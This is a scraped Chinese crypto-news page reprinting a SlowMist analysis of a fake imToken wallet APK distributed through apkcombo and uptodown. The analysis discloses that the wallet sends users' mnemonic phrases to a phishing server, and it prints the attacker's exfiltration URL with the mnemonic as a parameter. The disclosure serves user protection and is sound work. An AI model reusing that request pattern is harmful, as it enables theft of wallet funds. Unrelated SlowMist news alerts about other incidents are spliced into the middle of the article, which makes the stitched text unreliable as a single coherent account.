比特幣交易所 比特幣交易所
Ctrl+D 比特幣交易所
ads

慢霧:Web3假錢包第三方源調查分析_APK

Author:

Time:1900/1/1 0:00:00

背景

基于區塊鏈技術的Web3正在驅動下一代技術革命,越來越多的人開始參與到這場加密浪潮中,但Web3與Web2是兩個截然不同的世界。Web3世界是一個充滿著各種各樣的機遇以及危險的黑暗森林,身處Web3世界中,錢包則是進入Web3世界的入口以及通行證。當你通過錢包在Web3世界中探索體驗諸多的區塊鏈相關應用和網站的過程中,你會發現在一條公鏈上每個應用都是使用錢包“登錄”;這與我們傳統意義上的“登錄”不同,在Web2世界中,每個應用之間的賬戶不全是互通的。但在Web3的世界中,所有應用都是統一使用錢包去進行“登錄”,我們可以看到“登錄”錢包時顯示的不是“LoginwithWallet”,取而代之的是“ConnectWallet”。而錢包是你在Web3世界中的唯一通行證。俗話說高樓之下必有陰影,在如此火熱的Web3世界里,錢包作為入口級應用,自然也被黑灰產業鏈盯上。

慢霧:蘋果發布可導致任意代碼執行的嚴重漏洞提醒,請及時更新:7月11日消息,慢霧首席信息安全官23pds發推稱,近日蘋果發布嚴重漏洞提醒,官方稱漏洞CVE-2023-37450可以在用戶訪問惡意網頁時導致在你的設備上任意代碼執行,據信這個已經存在被利用的情況,任意代碼危害嚴重,請及時更新。[2023/7/11 10:47:05]

在Android環境下,由于很多手機不支持GooglePlay或者因為網絡問題,很多人會從其他途徑下載GooglePlay的應用,比如:apkcombo、apkpure等第三方下載站,這些站點往往標榜自己App是從GooglePlay鏡像下載的,但是其真實安全性如何呢?網站分析

鑒于下載途徑眾多,我們今天以apkcombo為例看看,apkcombo是一個第三方應用市場,它提供的應用據官方說大部分來源于其他正規應用商店,但事實是否真如官方所說呢?我們先看下apkcombo的流量有多大:

慢霧:昨日MEV機器人攻擊者惡意構造無效區塊,建議中繼運營者及時升級:金色財經報道,慢霧分析顯示,昨日MEV機器人被攻擊的問題原因在于即使信標區塊不正確,中繼仍將有效載荷(payload)返回給提議者,導致了提議者在另一個區塊被最終確定之前就能訪問區塊內容。攻擊者利用此問題,惡意構造了無效的區塊,使得該區塊無法被驗證,中繼無法進行廣播(狀態碼為202)從而提前獲得交易內容。mev-boost-relay昨日已緊急發布新版本緩解此問題,建議中繼運營者及時升級中繼。

據此前報道,昨日夾擊MEV機器人的惡意驗證者已被Slash懲罰并踢出驗證者隊列。[2023/4/4 13:43:37]

據數據統計站點similarweb統計,apkcombo站點:全球排名:1,809國家排名:7,370品類排名:168我們可以看到它的影響力和流量都非常大。它默認提供了一款chromeAPK下載插件,我們發現這款插件的用戶數達到了10W+:

慢霧:ERC721R示例合約存在缺陷,本質上是由于owner權限過大問題:4月12日消息,據@BenWAGMI消息,ERC721R示例合約存在缺陷可導致項目方利用此問題進行RugPull。據慢霧安全團隊初步分析,此缺陷本質上是由于owner權限過大問題,在ERC721R示例合約中owner可以通過setRefund Address函數任意設置接收用戶退回的NFT地址。

當此退回地址持有目標NFT時,其可以通過調用refund函數不斷的進行退款操作從而耗盡用戶在合約中鎖定的購買資金。且示例合約中存在owner Mint函數,owner可在NFT mint未達總供應量的情況下進行mint。因此ERC721R的實現仍是防君子不防小人。慢霧安全團隊建議用戶在參與NFTmint時不管項目方是否使用ERC721R都需做好風險評估。[2022/4/12 14:19:58]

慢霧:Let's Encrypt軟件Bug導致3月4日吊銷 300 萬個證書:Let's Encrypt由于在后端代碼中出現了一個錯誤,Let's Encrypt項目將在撤銷超過300萬個TLS證書。詳情是該錯誤影響了Boulder,Let's Encrypt項目使用該服務器軟件在發行TLS證書之前驗證用戶及其域。慢霧安全團隊提醒:數字貨幣行業有不少站點或內部系統為安全目的而使用 Let's Encrypt 自簽證書,請及時確認是否受到影響。如有影響請及時更新證書,以免造成不可預知的風險。用戶可查看原文鏈接在線驗證證書是否受到影響。[2020/3/4]

那么回到我們關注的Web3領域中錢包方向,用戶如果從這里下載的錢包應用安全性如何?我們拿知名的imToken錢包為例,其GooglePlay的正規下載途徑為:https://play.google.com/store/apps/details?id=im.token.app

動態 | 慢霧:巨鯨被盜2.6億元資產,或因Blockchain.info安全體系存在缺陷:針對加密巨鯨賬戶(zhoujianfu)被盜價值2.6億元的BTC和BCH,慢霧安全團隊目前得到的推測如下:該大戶私鑰自己可以控制,他在Reddit上發了BTC簽名,已驗證是對的,且猜測是使用了一款很知名的去中心化錢包服務,而且這種去中心化錢包居然還需要SIM卡認證,也就是說有用戶系統,可以開啟基于SIM卡的短信雙因素認證,猜測可能是Blockchain.info,因為它吻合這些特征,且歷史上慢霧安全團隊就收到幾起Blockchain.info用戶被盜幣的威脅情報,Blockchain.info的安全體系做得并不足夠好。目前慢霧正在積極跟進更多細節,包括與該大戶直接聯系以及盡力提供可能需求的幫助。[2020/2/22]

由于很多手機不支持GooglePlay或者因為網絡問題,很多人會從這里下載GooglePlay的應用。而apkcombo鏡像站的下載路徑為:https://apkcombo.com/downloader/#package=im.token.app

上圖我們可以發現,apkcombo提供的版本為24.9.11,經由imToken確認后,這是一個并不存在的版本!證實這是目前市面上假imToken錢包最多的一個版本。在編寫本文時imToken錢包的最新版本為2.11.3,此款錢包的版本號很高,顯然是為了偽裝成一個最新版本而設置的。如下圖,我們在apkcombo上發現,此假錢包版本顯示下載量較大,此處的下載量應該是爬取的GooglePlay的下載量信息,安全起見,我們覺得有必要披露這個惡意App的來源,防止更多的人下載到此款假錢包。

同時我們發現類似的下載站還有如:uptodown下載地址:https://imtoken.br.uptodown.com/android

我們發現uptodown任意注冊即可發布App,這導致釣魚的成本變得極低:

錢包分析

在之前我們已經分析過不少假錢包的案例,如:2021-11-24我們披露:《慢霧:假錢包App已致上萬人被盜,損失高達十三億美元》,所以在此不再贅述。我們僅對apkcombo提供版本為24.9.11這款假錢包進行分析,在開始界面創建錢包或導入錢包助記詞時,虛假錢包會將助記詞等信息發送到釣魚網站的服務端去,如下圖:

根據逆向APK代碼和實際分析流量包發現,助記詞發送方式:https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助記詞>

看下圖,最早的“api.funnel.rocks”證書出現在2022-06-03,也就是攻擊開始的大概時間:

俗話說一圖勝千言,最后我們畫一個流程圖:

總結

目前這種騙局活動不僅活躍,甚至有擴大范圍的趨勢,每天都有新的受害者受騙。用戶作為安全體系最薄弱的環節,應時刻保持懷疑之心,增強安全意識與風險意識,當你使用錢包、交易所時請認準官方下載渠道并從多方進行驗證;如果你的錢包從上述鏡像站下載,請第一時間轉移資產并卸載該軟件,必要時可通過官方驗證通道核實。同時,如需使用錢包,請務必認準以下主流錢包App官方網址:1/imToken錢包:https://token.im/2/TokenPocket錢包:https://www.tokenpocket.pro/3/TronLink錢包:https://www.tronlink.org/4/比特派錢包:https://bitpie.com/5/MetaMask錢包:https://metamask.io/6/TrustWallet:https://trustwallet.com/請持續關注慢霧安全團隊,更多Web3安全風險分析與告警正在路上。致謝:感謝在溯源過程中imToken官方提供的驗證支持。由于保密性和隱私性,本文只是冰山一角。慢霧在此建議,用戶需加強對安全知識的了解,進一步強化甄別網絡釣魚攻擊的能力等,避免遭遇此類攻擊。更多的安全知識建議閱讀慢霧出品的《區塊鏈黑暗森林自救手冊》。

Tags:COMWEBAPKTOKECompactweb3域名后綴metamask下載apkQuidd Token

火幣下載
veDAO研究院:如何玩轉BRC-20?_ORDI

BTC概念的加密貨幣有哪些?或許你腦海里最先浮現出來的是基于BTC生態分叉出來的衍生幣,比如BTD、BTK、BTF等等……這個說法在今年以前不算錯.

1900/1/1 0:00:00
一文詳解Cashmere:基于LayerZero的跨鏈抗MEV DEX聚合器_CAS

在DEX交易時非常容易遭到MEV攻擊,最常見的典型攻擊搶先交易和三明治攻擊,這類攻擊經常會攫取交易者的利益.

1900/1/1 0:00:00
?ZKP是安全跨鏈的必由之路嗎?_HAI

2022年起,隨著Multichain、Succinct與Celer等眾多跨鏈項目推出ZKP跨鏈測試網,基于ZKP的輕客戶端跨鏈成為行業熱點.

1900/1/1 0:00:00
美聯儲加息 25 個基點并暗示暫停,鮑威爾稱「現在降息為時過早」_BTC

美聯儲周三如期宣布加息25個基點,這是美聯儲自2022年3月以來的第10次加息,也是自2007年以來首次將聯邦基準利率上調至5%-5.25%的區間.

1900/1/1 0:00:00
Arthur Hayes:囤了那么久的LDO,我為何全部虧本拋售?_LID

最近,加密研究員ThorHartvigsen總結了過去30天內一些知名風險投資基金、大型投資者以及交易員在加密貨幣市場上的活動.

1900/1/1 0:00:00
Bankless:一覽五大新興L2項目,如何進行早期交互?_ROL

一年前,以太坊第二層(L2)擴展解決方案賽道的「四大」領頭羊是:Arbitrum、Optimism、zkSync和StarkNet.

1900/1/1 0:00:00
ads